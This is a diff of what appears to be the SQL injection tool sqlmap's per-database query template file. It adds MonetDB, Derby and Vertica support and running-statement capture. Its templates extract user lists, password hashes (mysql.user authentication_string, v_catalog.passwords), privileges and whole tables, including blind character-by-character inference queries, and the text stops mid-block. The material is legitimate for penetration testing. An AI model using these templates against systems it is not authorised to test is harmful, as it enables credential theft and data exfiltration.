@@ -32,15 +33,21 @@
            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user"/>
            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
        </users>
        <!-- https://github.com/dev-sec/mysql-baseline/issues/35 -->
        <!-- https://stackoverflow.com/a/31122246 -->
        <passwords>
-            <inband query="SELECT user,password FROM mysql.user" condition="user"/>
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
-            <blind query="SELECT DISTINCT(password) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(password)) FROM mysql.user WHERE user='%s'"/>
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
        </passwords>
        <privileges>
            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
        </privileges>
        <roles/>
        <statements>
            <inband query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST"/>
            <blind query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST ORDER BY ID LIMIT %d,1" query2="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE ID=%d" query3="SELECT ID FROM INFORMATION_SCHEMA.PROCESSLIST LIMIT %d,1" count="SELECT COUNT(DISTINCT(INFO)) FROM INFORMATION_SCHEMA.PROCESSLIST"/>
        </statements>
        <dbs>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT db FROM mysql.db"/>
            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1" query2="SELECT DISTINCT(db) FROM mysql.db LIMIT %d,1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA" count2="SELECT COUNT(DISTINCT(db)) FROM mysql.db"/>
@@ -112,8 +119,12 @@
            <blind query="SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'"/>
        </privileges>
        <roles/>
        <statements>
            <inband query="SELECT query FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'"/>
            <blind query="SELECT DISTINCT(query) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;' OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(query)) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'"/>
        </statements>
        <dbs>
-            <inband query="SELECT schemaname FROM pg_tables"/>
+            <inband query="SELECT DISTINCT(schemaname) FROM pg_tables"/>
            <blind query="SELECT DISTINCT(schemaname) FROM pg_tables OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables"/>
        </dbs>
        <tables>
@@ -180,6 +191,10 @@
        <!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->
        <privileges/>
        <roles/>
        <statements>
            <inband query="SELECT st.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st"/>
            <blind query="SELECT TOP 1 a.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) a WHERE a.text NOT IN (SELECT TOP %d b.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) b ORDER BY b.text) ORDER BY a.text" count="SELECT LTRIM(STR(COUNT(st.text))) FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st"/>
        </statements>
        <dbs>
            <inband query="SELECT name FROM master..sysdatabases" query2="SELECT DB_NAME(%d)"/>
            <blind query="SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name" count="SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases"/>
@@ -228,6 +243,9 @@
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
        <hex query="RAWTOHEX(%s)"/>
        <!--
        NOTE: ASCIISTR (https://www.techonthenet.com/oracle/functions/asciistr.php)
        -->
        <inference query="ASCII(SUBSTRC((%s),%d,1))>%d"/>
        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
        <current_user query="SELECT USER FROM DUAL"/>
@@ -268,6 +286,10 @@
            <inband query="SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
            <blind query="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
        </roles>
        <statements>
            <inband query="SELECT SQL_TEXT FROM V$SQL"/>
            <blind query="SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS LIMIT FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE LIMIT=%d" count="SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'"/>
        </statements>
        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
        <dbs>
            <inband query="SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)"/>
@@ -332,6 +354,7 @@
        <passwords/>
        <privileges/>
        <roles/>
        <statements/>
        <dbs/>
        <tables>
            <inband query="SELECT tbl_name FROM sqlite_master WHERE type='table'"/>
@@ -392,6 +415,7 @@
        <users/>
        <privileges/>
        <roles/>
        <statements/>
        <search_db/>
        <search_table/>
        <search_column/>
@@ -403,7 +427,7 @@
        <length query="CHAR_LENGTH(TRIM(%s))"/>
        <delimiter query="||"/>
        <limit query="ROWS %d TO %d"/>
-        <limitregexp query="\s+ROWS\s+([\d]+)(\s+\TO\s+([\d]+))?"/>
+        <limitregexp query="\s+ROWS\s+([\d]+)(\s+TO\s+([\d]+))?"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" ROWS "/>
@@ -435,6 +459,7 @@
            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$PRIVILEGE) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'" count="SELECT COUNT(DISTINCT(RDB$PRIVILEGE)) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'"/>
        </privileges>
        <roles/>
        <statements/>
        <dbs/>
        <columns>
            <!--<inband query="SELECT r.RDB$FIELD_NAME,CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>-->
@@ -504,8 +529,9 @@
            <inband query="SELECT owner,role FROM domain.roles" condition="owner"/>
            <blind/>
        </roles>
        <statements/>
        <dump_table>
-            <inband query="SELECT %s FROM %%s"/>
+            <inband query="SELECT %s FROM %s"/>
            <blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
        </dump_table>
   </dbms>
@@ -549,6 +575,7 @@
            <inband query="SELECT name,srid FROM master..syslogins,master..sysloginroles" condition="name"/>
            <blind/>
        </roles>
        <statements/>
        <dbs>
            <inband query="SELECT name FROM master..sysdatabases"/>
            <blind/>
@@ -620,6 +647,7 @@
            <blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
        </privileges>
        <roles/>
        <statements/>
        <!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
        <dbs>
            <inband query="SELECT schemaname FROM syscat.schemata"/>
@@ -690,6 +718,7 @@
        </passwords>
        <privileges/>
        <roles/>
        <statements/>
        <dbs>
            <blind query="SELECT LIMIT %d 1 DISTINCT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" count="SELECT COUNT(table_schem) FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS"/>
            <inband query="SELECT table_schem FROM INFORMATION_SCHEMA.SYSTEM_SCHEMAS ORDER BY table_schem" />
@@ -753,6 +782,7 @@
        <passwords/>
        <privileges/>
        <roles/>
        <statements/>
        <dbs>
            <inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA"/>
            <blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA OFFSET %d LIMIT 1" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
@@ -825,6 +855,7 @@
            <blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
        </privileges>
        <roles/>
        <statements/>
        <dbs>
            <inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
            <blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
@@ -845,4 +876,462 @@
        <search_table/>
        <search_column/>
    </dbms>
    <!-- MonetDB -->
    <dbms value="MonetDB">
        <cast query="CAST(%s AS VARCHAR(4000))"/>
        <length query="LENGTH(%s)"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="LIMIT %d OFFSET %d"/>
        <limitregexp query="\s+LIMIT\s+([\d]+)\s*OFFSET\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--" query2="#"/>
        <substring query="SUBSTRING((%s),%d,%d)"/>
        <concatenate query="CONCAT(%s,%s)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
        <inference query="ASCII(SUBSTRING((%s),%d,1))>%d"/>
        <banner query="SELECT value FROM environment WHERE name='monet_version'"/>
        <current_user query="CURRENT_USER"/>
        <current_db query="SELECT CURRENT_SCHEMA" query2="SELECT value FROM environment WHERE name='gdk_dbname'"/>
        <hostname/>
        <table_comment/>
        <column_comment/>
        <is_dba query="(SELECT grantor FROM auths WHERE name=CURRENT_USER)=0"/>
        <check_udf/>
        <users>
            <inband query="SELECT name FROM sys.users"/>
            <!-- NOTE: LIMIT %d OFFSET %d not supported inside subqueries -->
            <blind query="SELECT name FROM (SELECT name,row_number() over() AS y FROM sys.users)x WHERE x.y-1=%d" count="SELECT COUNT(name) FROM sys.users"/>
        </users>
        <passwords/>
        <privileges/>
        <roles/>
        <statements/>
        <dbs>
            <inband query="SELECT name FROM schemas"/>
            <blind query="SELECT name FROM (SELECT name,row_number() over() AS y FROM sys.schemas)x WHERE x.y-1=%d" count="SELECT COUNT(DISTINCT(name)) FROM schemas"/>
        </dbs>
        <tables>
            <inband query="SELECT schemas.name,tables.name FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false"/>
            <blind query="SELECT name FROM (SELECT tables.name,row_number() over() AS y FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s')x WHERE x.y-1=%d" count="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT name,type FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s' AND tables.id=table_id)" condition="name"/>
            <blind query="SELECT name FROM (SELECT name,row_number() over() AS y FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s'))x WHERE x.y-1=%d" query2="SELECT type FROM columns WHERE name='%s' AND table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s')" count="SELECT COUNT(name) FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s')" condition="name"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s"/>
            <blind query="SELECT z FROM (SELECT %s AS z,row_number() over() AS y FROM %s.%s)x WHERE x.y-1=%d" count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT schemas.name FROM schemas WHERE %s" condition="schemas.name"/>
            <blind query="SELECT DISTINCT(schemas.name) FROM schemas WHERE %s" count="SELECT COUNT(DISTINCT(schemas.name)) FROM schemas WHERE %s" condition="schemas.name"/>
        </search_db>
        <search_table>
            <inband query="SELECT schemas.name,tables.name FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND %s" condition="tables.name" condition2="schemas.name"/>
            <blind query="SELECT DISTINCT(schemas.name) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND %s" query2="SELECT DISTINCT(tables.name) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'" count="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'" count2="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'" condition="tables.name" condition2="schemas.name"/>
        </search_table>
        <search_column>
            <inband query="SELECT schemas.name,tables.name FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s" condition="columns.name" condition2="schemas.name" condition3="tables.name"/>
            <blind query="SELECT DISTINCT(schemas.name) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s" query2="SELECT DISTINCT(tables.name) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE schemas.name='%s'" count="SELECT COUNT(DISTINCT(schemas.name)) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s" count2="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE schemas.name='%s'" condition="columns.name" condition2="schemas.name" condition3="tables.name"/>
        </search_column>
    </dbms>
    <!-- Apache Derby -->
    <dbms value="Apache Derby">
        <!-- NOTE: CHAR(%s) causes 'A truncation error was encountered trying to shrink CHAR' -->
        <cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="{LIMIT %d OFFSET %d}"/>
        <limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
        <limitgroupstart query="2"/>
        <limitgroupstop query="1"/>
        <limitstring/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <!-- NOTE: comment without alphanumeric char in continuation is invalid -->
        <comment query="--x"/>
        <substring query="SUBSTR((%s),%d,%d)"/>
        <concatenate query="%s||%s"/>
        <!-- NOTE: Apache Derby does not support implicit conversion from int to string -->
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1"/>
        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
        <banner/>
        <current_user query="SELECT USER FROM SYSIBM.SYSDUMMY1"/>
        <current_db query="SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1"/>
        <hostname/>
        <table_comment/>
        <column_comment/>
        <!-- NOTE: ERROR 4251D: Only the database owner can perform this operation. -->
        <is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
        <dbs>
            <inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
            <blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
        </dbs>
        <tables>
            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
            <blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
        </tables>
        <columns>
            <!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
            <inband query="SELECT COLUMNNAME,RTRIM(CAST(COLUMNDATATYPE AS CHAR(254))) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'" condition="COLUMNNAME"/>
            <blind query="SELECT COLUMNNAME FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'" query2="SELECT COLUMNDATATYPE FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND COLUMNNAME='%s' AND SCHEMANAME='%s'" count="SELECT COUNT(COLUMNNAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'" condition="COLUMNNAME"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
            <blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
        <users>
            <inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
            <blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
        </users>
        <!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
        <passwords/>
        <privileges/>
        <roles/>
        <statements/>
        <search_db>
            <inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS WHERE %s" condition="SCHEMANAME"/>
            <blind query="SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSSCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSSCHEMAS WHERE %s" condition="SCHEMANAME"/>
        </search_db>
        <search_table>
            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" condition="TABLENAME" condition2="SCHEMANAME"/>
            <blind query="SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" query2="SELECT DISTINCT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'" count="SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" count2="SELECT COUNT(DISTINCT(TABLENAME)) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'" condition="TABLENAME" condition2="SCHEMANAME"/>
        </search_table>
        <search_column>
            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" condition="COLUMNNAME" condition2="SCHEMANAME" condition3="TABLENAME"/>
            <blind query="SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" count="SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" query2="SELECT DISTINCT(TABLENAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" count2="SELECT COUNT(DISTINCT(TABLENAME)) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'" condition="COLUMNNAME" condition2="SCHEMANAME" condition3="TABLENAME"/>
        </search_column>
   </dbms>
    <!-- Vertica -->
    <dbms value="Vertica">
        <cast query="CAST(%s AS CHARACTER(10000))"/>
        <length query="LENGTH(%s)"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="OFFSET %d LIMIT %d"/>
        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" OFFSET "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
        <substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
        <!-- NOTE: requires >=9.1.1 because of 'cannot cast type varchar to varbinary' -->
        <hex query="TO_HEX((%s)::varbinary)"/>
        <inference query="ASCII(SUBSTRING((%s)::varchar FROM %d FOR 1))>%d"/>
        <banner query="VERSION()"/>
        <current_user query="CURRENT_USER"/>
        <current_db query="CURRENT_SCHEMA()"/>
        <hostname query="SELECT MIN(node_name) FROM v_catalog.nodes"/>
        <table_comment query="SELECT comment FROM v_catalog.comments WHERE object_type='TABLE' AND object_schema='%s' AND object_name='%s'"/>
        <!-- NOTE: Vertica uses "projection columns" in case of column comments (e.g. testusers_super.surname) -->
        <column_comment query="SELECT comment FROM v_catalog.comments WHERE object_type='COLUMN' AND object_schema='%s' AND object_name LIKE '%.%s'"/>
        <is_dba query="(SELECT is_super_user FROM v_catalog.users WHERE user_name=CURRENT_USER OFFSET 0 LIMIT 1)"/>
        <check_udf query="(SELECT procedure_name='%s' FROM v_catalog.user_procedures WHERE procedure_name='%s' OFFSET 0 LIMIT 1)"/>
        <users>
            <inband query="SELECT user_name FROM v_catalog.users"/>
            <blind query="SELECT user_name FROM v_catalog.users OFFSET %d LIMIT 1" count="SELECT COUNT(user_name) FROM v_catalog.users"/>
        </users>
        <passwords>
            <inband query="SELECT user_name,password FROM v_catalog.passwords" condition="user_name"/>
            <blind query="SELECT password FROM v_catalog.passwords WHERE user_name='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(password) FROM v_catalog.passwords WHERE user_name='%s'"/>
        </passwords>
        <privileges>
            <inband query="SELECT grantee,privileges_description FROM v_catalog.grants WHERE object_type!='PROCEDURE'" condition="grantee"/>
            <!-- NOTE: Vertica does not cache DISTINCT queries (must use ORDER BY to have consistent results) -->
            <blind query="SELECT DISTINCT(privileges_description) FROM v_catalog.grants WHERE grantee='%s' ORDER BY 1 LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT(privileges_description)) FROM grants WHERE grantee='%s'"/>
        </privileges>
        <roles/>
        <statements>
            <inband query="SELECT current_statement FROM v_monitor.sessions"/>
            <blind query="SELECT DISTINCT(current_statement) FROM v_monitor.sessions ORDER BY 1 OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(current_statement)) FROM v_monitor.sessions"/>
        </statements>
        <dbs>
            <inband query="SELECT schema_name FROM v_catalog.schemata"/>
            <blind query="SELECT DISTINCT(schema_name) FROM v_catalog.schemata ORDER BY 1 OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.schemata"/>
        </dbs>
        <tables>
            <inband query="SELECT schema_name,table_name FROM v_catalog.all_tables" condition="schema_name"/>
            <blind query="SELECT table_name FROM v_catalog.all_tables WHERE schema_name='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(table_name) FROM v_catalog.all_tables WHERE schema_name='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT column_name,data_type FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
